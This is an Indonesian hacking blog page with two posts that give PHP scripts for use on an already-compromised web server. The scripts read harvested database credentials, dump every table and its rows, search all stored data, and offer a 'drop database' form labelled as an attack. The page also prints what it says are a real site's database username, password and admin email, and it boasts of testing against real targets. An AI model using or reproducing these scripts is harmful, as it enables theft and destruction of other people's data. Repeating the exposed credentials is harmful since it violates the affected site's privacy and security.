LaGiPusHinGWitH ---- IT

Navigation

Home |

Categories

• Computer Hacking
• Computer Diary
• Computer DataBase
• Computer Propaganda
• Computer Prophile
• Computer Security
• Computer Unix

Monthly Archives

• September 2010
• October 2009
• December 2008
• November 2008
• October 2008
• September 2008
• July 2008
• May 2008
• March 2008
• December 2007
• October 2007
• September 2007
• August 2007

Most recent entries

• Create Oracle Tablespace on SAP with BRTools
• Audit on Oracle Database
• Membuat Oracle Data Guard
• Cerita Tentang Kamu
• Membuat ulang/re-create controlfile di oracle
• Membuat RMAN dengan crontab
• Saat kau hadir kembali
• Memindahkan controlfile dan redologfile pada Oracle
• Oracle Dataguard on Standart Edition
• Adakah aku dihatimu
• Instalasi 10g di HP-UX Itanium
• Instalasi OpenOffice di Slackware 12
• Syncronize archive log
• Merubah ukuran archived Log
• Alter Block Size for tablespace

Syndicate

• RSS 2.0
• Atom

Site Credits

Powered by:
ExpressionEngine

Design by:
BlogMoxie

Author: roninmorgue
Date: May, 03th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
------------------------------------------------------------------
Ok...saat ini kita telah berhasil menembus sebuah server, dan memiliki akses level
nobody. Tentu kita bertanya, apa yang harus dilakukan untuk mendeface ataupun melihat
data pada database(mysql) sedangkan tanpa akses root itu adalah mustahil???? :(

Gue juga mengalami hal ini...saat sudah berada dalam server hostingan kesulitan untuk
menelusuri data pada database, maka untuk mengatasi hal tersebut gue membuat script
PHP yang sederhana untuk melakukan tugas pencarian data pada database target.

Syarat apa aja yang harus terpenuhi agar script ini berjalan dengan sukses:
1. Akses langsung keserver (bisa diupload; caranya banyaklah n pake aja exploit yang
ada -> maklum script kiddies) ataupun memanfaatkan bug pada aplikasi webnya
2. mengetahui namadatabase, usernamedatabase, dan password databasenya :D
(wiiiihhh...sama aja boong dong, gimana cara kita dapatkan data2 itu man??)
-->> sabar...sabar jangan ngamuk dulu, inget diserver linux nobody pun bisa melihat
file2 yang memilki tanda -r, dan biasanya aplikasi web, file koneksi kedatabasenya
beratribut -r untuk other. (trus gimana tahu path dari domain target???)
-->> hmmm...bisa dari bug Full Path Disclosure sebelumnya(masih inget artikel2gw sebelumnyakan tentang full path disclosure??? atau dengan cara mencari
group2 domain yang ada pada path2 diserver.

c/: $ /var/www/html/domain_target/
nah, kl dah ketemu uploadlah 3 buah file php dibawah ini ke path domain
trus cari nama file yang nyerempet2 koneksilah, misal koneksi.php
c/: $ vi /var/www/html/domain_target/koneksi.php
<?
/* Database Information - Required!! */
/*—Configure the Variables Below --*/
$dbhost = 'localhost';
$dbusername = 'webadm_anes';
$dbpasswd = '123456';
$database_name = 'webadm_account';
$sitepath = "http://www.asiasunlight.com";
$sitename = "AsiaSunlight";
$adminemail = "anes_hope@yahoo.com";
/* Database Stuff, do not modify below this line */
$connection = mysql_pconnect("$dbhost","$dbusername","$dbpasswd")
or die ("Couldn't connect to server.");

$db = mysql_select_db("$database_name", $connection)
or die("Couldn't select database.");
?>

gotcha… gw bisa liat deh semua konfigurasi databasenya… smile
3. OK… upload 3 file udah, dapet konfigurasi udah...sekarang apa yah??
jalankan browser kita (terserah pake apa ajalah), trus ketik diurl:
http://www.asiasunlight.com/config1.php
maka tampilan utama script ini akan berjalan...masukkan semua data2 itu ke field2
yang sudah disiapkan n trus .... ah coba aja deh sendiri… smile
contoh salah satu hasil yang didapatkan:

7 Multi Electronic anes_hope@yahoo.com multielectron d6328b581e5ed9c8c22fcdddd7fe4139
w1bh9rkw My Company 0 2005-07-29 15:51:3

4. Cobanya di server sendiri aja dulu (home PC dirumah man)
5. TRus gw juga bikin script juga sih yang lebih memudahkan dalam pencarian data didatabasenya
n bisa digunakan untuk langsung merubah data tersebut.... ntar gw posting(tp kayanya udah
deh diforum PHP) gabungin aja deh sendiri yah -->> kl minat sih, ngga juga ngga papa
ini semua hanya untuk pembelajaran aja kok.

ps: nama domain diatas adalah real...dan dah pernah gw coba (server hostingan gw rahasiain)

config1.php
<?php
/****************************************************************/
/* DataBase Hacking: Hacking dengan menggunakan DB untuk situs CMS */
/*=============================================================== */
/* Copyright (c) 2005 by roninmorgue (roninmorgue@yahoo.co.id) */
/* or koyakaguya@yahoo.com */
/* Program ini adalah free software. Anda dapat mendistribusikannya dan */
/* memodifikasinya */
/***************************************************************/

if(!$submit) {
echo "<center>Hacking Database";
echo "<center>by roninmorgue at roninmorgue@yahoo.co.id
";
echo "===== seratus dua puluh satu langkah lebih maju =====";

echo "
<form name="form1" method="post" action="">
<table width="325" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">
<tr bgcolor="#000000">
<td width="150"><font color="#FFFF00" size="2">Masukkan database</font></td>
<td width="4"><font color="#FFFF00" size="2">:</font></td>
<td width="170"><input name="db" type="text" id="db"></td>
</tr>
<tr bgcolor="#000000">
<td width="150"><font color="#FFFF00" size="2">Masukkan username</td>
<td width="4"><font color="#FFFF00" size="2">:</td>
<td width="170"><input name="user" type="text" id="user"></td>
</tr>
<tr bgcolor="#000000">
<td width="150"><font color="#FFFF00" size="2">Masukkan nama server</td>
<td width="4"><font color="#FFFF00" size="2">:</td>
<td width="170"><input name="server" type="text" id="server" value="localhost"></td>
</tr>
<tr bgcolor="#000000">
<td width="150"><font color="#FFFF00" size="2">Masukkan password</td>
<td width="4"><font color="#FFFF00" size="2">:</td>
<td width="170"><input name="password" type="text" id="password"></td>
</tr>
<tr bgcolor="#000000">
<td></td>
<td></td>
<td><input name="submit" type="submit" id="submit" value="Attack"></td>
</tr>
</table>
</form>";
}
else
{
mysql_connect($server,"$user", "$password");
$hasil=mysql_db_query($db, "show tables from $db");
$isi=mysql_num_rows($hasil);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
$isi2.="$isi1[$jml] ";
}
}
echo "Lihat field Table pada $db";
echo "
<form name="form1" method="post" action="config2.php?proses=1">
<table width="325" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">
<tr bgcolor="#000000">
<td width="150"><font color="#FFFF00" size="2">Masukkan table</td>
<td width="4">:</td>
<td width="170">
<input name="table" type="text" id="table">
<input type="hidden" name="db" value="$db">
<input type="hidden" name="server" value="$server">
<input type="hidden" name="user" value="$user">
<input type="hidden" name="password" value="$password"></td>
</tr>
<tr bgcolor="#000000">
<td></td>
<td></td>
<td><input name="submit" type="submit" id="submit" value="Attack"></td>
</tr>
</table>
</form> ";
echo "Nama-nama table database $db

";
echo "<table width="700" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">";
echo "<tr bgcolor="#000000"><td><font color="#FFFF00" size="2">$isi2</td></tr></table>";
echo "
<a href=config1.php>kembali</a>";
}
?>

config2.php
<?php
/***************************************************************/
/* DataBase Hacking: Hacking dengan menggunakan DB untuk situs CMS */
/* ================================================================ */
/* Copyright (c) 2005 by roninmorgue (roninmorgue@yahoo.co.id) */
/* or koyakaguya@yahoo.com */
/* Program ini adalah free software. Anda dapat mendistribusikannya dan */
/* memodifikasinya */
/************************************************************/
switch($proses)
{
case'1':
{
mysql_connect("$server","$user", "$password");
$parameter=mysql_db_query($db, "show fields from $table");
$isi1=mysql_num_rows($parameter);
while($isi2=mysql_fetch_row($parameter))
{
for($jml=0;$jml<$isi1;$jml++)
{
$isi3.="$isi2[$jml] ";
}
}
echo "field-field table $table

";
echo "<table width="700" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">";
echo "<tr bgcolor="#000000"><td><font color="#FFFF00" size="3">$isi3</td></tr></table>";

$hasil=mysql_db_query($db, "select * from $table");
$isi=mysql_num_rows($parameter);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
$isi2.="$isi1[$jml] "."|";
}
}
echo "

isi table $table

";
echo "<table width="700" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">";
echo "<tr bgcolor="#000000"><td><font color="#FFFF00" size="3">$isi2</td></tr></table>";

$formdrop.="
Hapus Database
<form name="form1" method="post" action="config3.php?kerja=1">
<table width="233" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">
<tr bgcolor="#000000">
<td width="59"><font color="#FFFF00" size="2">Drop query</td>
<td width="4">:</td>
<td width="170"><input name="query" type="text" id="query" value="drop database $db">
<input type="hidden" name="db" value="$db">
<input type="hidden" name="server" value="$server">
<input type="hidden" name="s_user" value="$user">
<input type="hidden" name="s_password" value="$password"></td>
</tr>
<tr bgcolor="#000000">
<td></td>
<td>:</td>
<td><input name="submit" type="submit" id="submit" value="Serang"></td>
</tr>
</table>
</form>
";
echo "<table><tr valign="top">
<td>$formdrop</td>
</tr></table>";
echo "<a href=config1.php>kembali</a>";
}
break;
}
?>

config3.php
<?php
/***************************************************************/
/* DataBase Hacking: Hacking dengan menggunakan DB untuk situs CMS */
/* ============================================================== */
/* Copyright (c) 2005 by roninmorgue (roninmorgue@yahoo.co.id) */
/* or koyakaguya@yahoo.com */
/* Program ini adalah free software. Anda dapat mendistribusikannya dan */
/* memodifikasinya */
/**********************************************************/

mysql_connect("$server","$s_user", "$s_password");

switch($kerja)
{
case'1':
{
$hasildrop=mysql_db_query($db,"$query");
if($hasildrop){
echo "<center>Selamat roninmorgue
Anda telah menghapus database Situs Ini!!!!";
} else {
echo "<center>roninmorgue
Anda Gagal menghapus database Situs ini
Lebih Teliti lagi!!!!!";
}
break;
}
}
?>

--------------------------------------------------------------
Shoutz:
~~~~~~~

~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie, cloud)
~ mercubuana-it@yahoogroups.com ,
---------------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
Posted by roninmorgue on 08/18 at 05:07 PM
Computer Hacking • (0) Comments • (0) Trackbacks • Permalink
Searching Isi Database MySQL via PHP Script

Author: roninmorgue
Date: May, 03th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
--------------------------------------------------------------
Setelah saya menulis artikel pertama, “exploit database via php script\” ... saya menemukan
kesulitan untuk mencari isi database dari situs target yang memiliki struktur database
yang banyak dan komplek.

Dengan struktur database komplek maka penelusuran isi database akan sangat melelahkan dan
membosankan .... ditambah tentu saja pemborosan biaya internet, untuk memudahkan masalah
tersebut maka saya mencoba untuk membuat script yang berfungsi untuk menelusuri seluruh isi
database target hanya dengan memasukkan kata kunci pencarian, maka script akan berjalan
secara otomatis.

jadi saya akan mereview sedikit script pertama “exploit database via php script\”

tambahkan script ini pada file config1.php

echo “<font color="#FFFF00" size="3">Cari data pada basisdata $db</font>”;
echo “
<form name="form1" method="post" action="caridatadb.php">
<table width="325" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">
<tr bgcolor="#000000">
<td width="150"><font color="#FFFF00" size="2">Cari Data</td>
<td width="4">:</td>
<td width="170"><input name="data" type="text" id="data">
<input type="hidden" name="db" value="$db">
<input type="hidden" name="server" value="$server">
<input type="hidden" name="user" value="$user">
<input type="hidden" name="password" value="$password"></td>
</tr>
<tr bgcolor="#000000">
<td></td>
<td></td>
<td><input name="submit" type="submit" id="submit" value="Attack"></td>
</tr>
</table>
</form> “;

OK...fungsi dari script ini untuk input data server, nama database, nama user, password database,
dan kata kunci pencarian data, sepertinya tidak perlu dijelaskan lagi cara mencari konfigurasi
database tersebut.

selanjutnya script kedua berfungsi untuk memproses input tersebut dan akan menelusuri isi
database,dan menampilkan isi database yang kita cari, sekaligus akan terlihat struktur dari
database tersebut....

caridatadb.php
<?php
/****************************************************************/
/* DataBase Hacking: Hacking dengan menggunakan DB untuk situs CMS */
/* =============================================================== */
/* */
/* Modul Pencarian Isi DataBase */
/* Copyright (c) 2006 by anstellwinkel (anstellwinkel@yahoo.com.au) */
/* or koyakaguya@yahoo.com */
/* */
/* Program ini adalah free software. Anda dapat mendistribusikannya dan */
/* memodifikasinya sesuai keinginan anda dengan tetap menyertakan */
/* nama author */
/****************************************************************/
echo "<center>Hacking Database
Modul Pencarian Isi Database

";
echo "<center>by anstellwinkel at anstellwinkel@yahoo.com.au";
mysql_connect($server,"$user", "$password");
$hasil=mysql_db_query($db, "show tables from $db");
$isi=count($hasil);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
echo "<table width="700" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">";
echo "
<tr bgcolor="#000000"><td><font color="#EB8038" size="3">
<center>Tabel $isi1[$jml]<center>
</td></tr></table>";

$parameter=mysql_db_query($db, "show fields from $isi1[$jml]");
$isi5=count($parameter);

while($isi3=mysql_fetch_row($parameter))
{
for($jml1=0;$jml1<$isi5;$jml1++)
{
echo "<table width="700" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">";
echo "<tr bgcolor="#000000"><td><font color="#FFFF00" size="2">$isi3[$jml1]
</td></tr></table>";

$pencarian=mysql_db_query($db, "select $isi3[$jml1] from $isi1[$jml]
where $isi3[$jml1] like '%$data%'");
$isi8=count($pencarian);
while($hasilcari=mysql_fetch_row($pencarian))
{
for($jml2=0;$jml2<$isi8;$jml2++)
{
$result=$hasilcari[$jml2];
echo "<table width="700" border="1" cellspacing="1" cellpadding="0" bordercolor="#0000FF">";
echo "<tr bgcolor="#000000"><td><font color="#00FF00" size="2">$result
</td></tr></table>"; }}
}
}
}
}

?>

dan sekali lagi sebagai catatan script ini harus diupload keserver target....caranya terserah anda!!!!
semua artikel ini sudah diujicobakan oleh saya sendiri ke server target ( bagi admin yang
kena testing ini jangan marah yah… ngga ngerusak ko!!!! wink peace man )

Sebagai tambahan script ini juga dapat digunakan untuk pencarian data pada situs anda
( modifikasi aja man & girl )

Ok!!!...sepertinya hanya ini aja ... untuk download script lengkapnya saya gabungkan dengan
script saya yang pertama dan kedua ("expolit database via php script & Browsing Folder server tanpa
fungsi cmd()") di
http://www.geocities.com/anstellwinkel/ ... equest.zip

----------------------------------------------------------------

Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie, cloud)
~ mercubuana-it@yahoogroups.com ,
----------------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
-------------------------------- [ EOF ] ------------------------